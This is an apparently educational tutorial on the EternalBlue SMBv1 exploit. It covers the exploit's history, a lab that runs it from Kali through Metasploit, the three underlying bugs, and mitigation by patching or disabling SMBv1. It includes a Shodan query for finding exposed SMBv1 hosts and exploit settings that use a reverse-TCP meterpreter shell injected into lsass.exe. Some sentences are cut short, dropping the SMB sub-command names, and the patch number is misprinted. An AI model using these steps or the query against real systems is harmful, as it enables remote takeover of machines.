Educational purpose only.
Quick intro Eternal Blue 101
What is Eternal Blue?
EternalBlue, sometimes stylized as ETERNALBLUE, is a cyber-attack exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017.
There are still tons of vulnerable systems on the internet.
Shodan has servers located around the world that crawl the Internet 24/7 to provide the latest Internet intelligence…
Shodan search to identify potentially unpatched and affected systems:
port:445 “SMB Version: 1” os:Windows !product:Samba
When run, we see that there are about 974,800 systems on the internet that could be vulnerable. This string does not search for vulnerabilities so we don’t know if these are patched systems or not.
Lab set up
In this lab, I will use Eternal Blue from GitHub and I will add the exploit to the Metasploit database (for the meterpreter shell purpose)
Lab set up:
Windows 7 64 architecture
Eternal Blue Exploit Double Pulsar exploit from Github
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
Setting up Kali:
Download Eternal Blue exploit from Github to the root directory
Add the exploit to your current Metasploit database
Install and set up wine emulator to the root directory
Nmap scan to identify open 445 port on the target machine.
Set up the payload:
set rhosts target machine IP address
set processinject lsass.exe (for 64 architecture)
set targetarchitecture x64
winepath — should be in the root directory
other options should be left as default
set payload windows/x64/metepreter/reverse_tcp
set lhost Kali IP address
other options should be left as default
and run exploit command
How does Eternal Blue Work
Eternal Blue relies on a Windows function named
srv!SrvOS2FeaListSizeToNt. To see how this leads to remote code execution, let’s take a quick look at how SMB works.
Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
Eternal Blue exploits three bugs:
The first is a mathematical error when the protocol tries to cast an OS/2 FileExtended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. A miscalculation creates an integer overflow that causes less memory to be allocated than expected, which in turns leads to a buffer overflow. With more data than expected being written, the extra data can overflow into adjacent memory space.
Triggering the buffer overflow is achieved thanks to the second bug, which results from a difference in the SMB protocol’s definition of two related sub commands:
Both have a
_SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between
NT_TRANSACT is that the latter calls for a data packet twice the size of the former. This is significant because an error in validation occurs if the client sends a crafted message using the
NT_TRANSACT sub-command immediately before the
While the protocol recognizes that two separate sub-commands have been received, it assigns the type and size of both packets (and allocates memory accordingly) based only on the type of the last one received. Since the last one is smaller, the first packet will occupy more space than it is allocated.
Once the attackers achieve this initial overflow, they can take advantage of a third bug in SMBv1 which allows heap spraying, a technique which results in allocating a chunk of memory at a given address. From here, the attacker can write and execute shellcode to take control of the system.
Eternal Blue exploit should work on every single unpatched Windows 7 and below including Windows XP (all services pack) (x86) (x64), Windows Server 2003 SP0 (x86),Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64),Windows Vista (x86), Windows Vista (x64), Windows Server 2008 (x86), Windows Server 2008 R2 (x86) (x64).
How to stay secure from Eternal Blue
If possible apply Microsoft patch MS17–10, if this is not the case disabling SMBv1 also mitigate the risk.